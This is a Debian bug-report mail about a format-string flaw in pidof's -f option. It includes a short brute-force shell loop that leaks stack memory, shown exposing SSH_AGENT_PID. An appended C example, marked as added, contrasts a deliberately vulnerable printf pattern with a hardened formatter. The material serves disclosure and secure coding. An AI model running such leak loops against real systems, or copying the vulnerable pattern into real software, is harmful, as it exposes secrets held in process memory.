Bug#924792: pidof: unsanitized user input makes pidof crash

Matteo Croce mcroce at redhat.com
Mon Mar 18 18:58:08 GMT 2019


> What's the attack vector here (making this an exploit rather than
> "just" a bug)?
> 

I didn't investigate too much, but with a trivial brute force I can add
%hhd at will until I dump what I need from the stack:

$ arg='[%d '; until ./pidof -f "$arg] mem: %s" pidof teststring | grep -q teststring; do arg="$arg %hhd"; done
$ ./pidof -f "$arg] mem: %s"
pidof teststring [30286  0 -128 0 48 -45 -1 0 -112 -128 0 0 0 -40 0 0 0
120 -32 7 72 7 -112 28 0 88 0 0 47 47 0 0 0 0 95 76 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 -48 8 -16 0 -96 116 8 -104 -16 -88 -92 0 2 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 -64 0 -64 8 5 0 0 -96 1 -43 0 0 -32 0 -64 -16 0 0 0 19 0 8 0 -64
0 -124 -16 0 0 0 -124 -124 0 0 0 56 80 10 0 0 -16 0 0 30 -8 -96 5 -56
-48 -45 11] mem: teststring

$ arg='[%d '; until ./pidof -f "$arg] mem: %s" pidof | grep -q SSH_AGENT_PID; do arg="$arg %hhd"; done
$ ./pidof -f "$arg] mem: %s"
pidof [31295  0 -128 0 104 -49 -1 0 -112 -128 0 0 0 -40 0 0 0 120 32 7
72 7 -112 28 0 88 0 0 47 47 0 0 0 0 95 76 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 16 8 -16 0 -96 116 8 -104 -16 -24 -28 0 2 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 -64 0
-64 72 4 0 0 -96 1 -43 0 0 -32 0 -64 -16 64 0 0 19 0 72 0 -64 0 -60 -16
64 0 0 -60 -60 0 0 0 112 80 10 0 0 -16 64 0 30 56 -96 4 -60 -52 -49 22
0 28 39] mem: SSH_AGENT_PID=892

Probably someone more skilled and motivated than me can do much
better (or worse, depends).

> Wouldn't you need to have some process which was passing untrusted
> data
> directly to the `-f` argument, is that likely in the real world?
> 
> Ian.

I hope not, but you can never know.

Regards,
-- 
Matteo Croce
per aspera ad upstream
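Added example, not part of the mail above and not pidof's own source: the shape of the bug the brute-force loop relies on (a user-controlled template handed to printf with fewer arguments than it consumes) next to a hardened formatter that expands only a documented directive set and refuses everything else. The function names, the "%d means pid" convention and the sample templates are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

/* VULNERABLE pattern (hypothetical, mirrors the bug class reported above): the
 * template typed by the user becomes printf's format string while only one real
 * argument is supplied.  Every extra conversion the user adds reads whatever the
 * calling convention puts next (argument registers, then the stack), which is
 * exactly what appending "%hhd" until "%s" lands on a string pointer walks
 * through.  Calling this with an untrusted template is undefined behaviour. */
void vulnerable_print(const char *user_fmt, int pid)
{
    printf(user_fmt, pid);
}

/* Count the conversions in a printf-style format that consume an argument.
 * "%%" is a literal and consumes nothing; any other '%' followed by optional
 * flags, width, precision and length modifiers plus a conversion letter
 * consumes one, and a '*' width or precision pulls one more from the list.
 * The difference between this count and the arguments actually passed is the
 * number of unrelated memory words the call will read. */
int count_conversions(const char *fmt)
{
    int n = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')              /* "%%": literal percent sign */
            continue;
        while (*p && strchr("-+ #0123456789.*hlLqjzt", *p)) {
            if (*p == '*')
                n++;                /* width/precision taken from the arg list */
            p++;
        }
        if (!*p)
            break;                  /* trailing lone '%': malformed, stop */
        n++;                        /* the conversion itself consumes one */
    }
    return n;
}

/* Hardened replacement for passing the template to printf: walk it ourselves
 * and expand only the directives the program documents ("%d" -> pid,
 * "%%" -> '%').  Anything else is rejected rather than interpreted, so the
 * template can never read memory the caller did not hand over.  Returns the
 * number of bytes written, or -1 if the template contains an unsupported or
 * malformed directive or the result does not fit in out. */
int safe_format(const char *tmpl, int pid, char *out, size_t outlen)
{
    size_t used = 0;
    for (const char *p = tmpl; *p; p++) {
        if (*p != '%') {
            if (used + 1 >= outlen)
                return -1;
            out[used++] = *p;
            continue;
        }
        p++;
        if (*p == '%') {
            if (used + 1 >= outlen)
                return -1;
            out[used++] = '%';
        } else if (*p == 'd') {
            int w = snprintf(out + used, outlen - used, "%d", pid);
            if (w < 0 || (size_t)w >= outlen - used)
                return -1;
            used += (size_t)w;
        } else {
            return -1;              /* unsupported directive (%s, %hhd, %n, ...) */
        }
    }
    out[used] = '\0';
    return (int)used;
}

int main(void)
{
    /* Constructed template in the style of the one from the mail. */
    const char *probe = "[%d %hhd %hhd %hhd] mem: %s";
    char buf[64];

    printf("%s consumes %d arguments, 1 supplied\n", probe, count_conversions(probe));
    printf("safe_format(probe) -> %d (rejected)\n", safe_format(probe, 30286, buf, sizeof buf));
    if (safe_format("pid=%d (100%%)", 30286, buf, sizeof buf) >= 0)
        printf("safe_format(\"pid=%%d (100%%%%)\") -> \"%s\"\n", buf);
    vulnerable_print("pid=%d\n", 30286);   /* only safe because the template is a literal here */
    return 0;
}
```

The hardened version deliberately does not try to "sanitize" the user's template by stripping dangerous directives; it accepts a closed set and fails on anything else, which is the only way to keep %n, %s and the register/stack walk out of reach.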
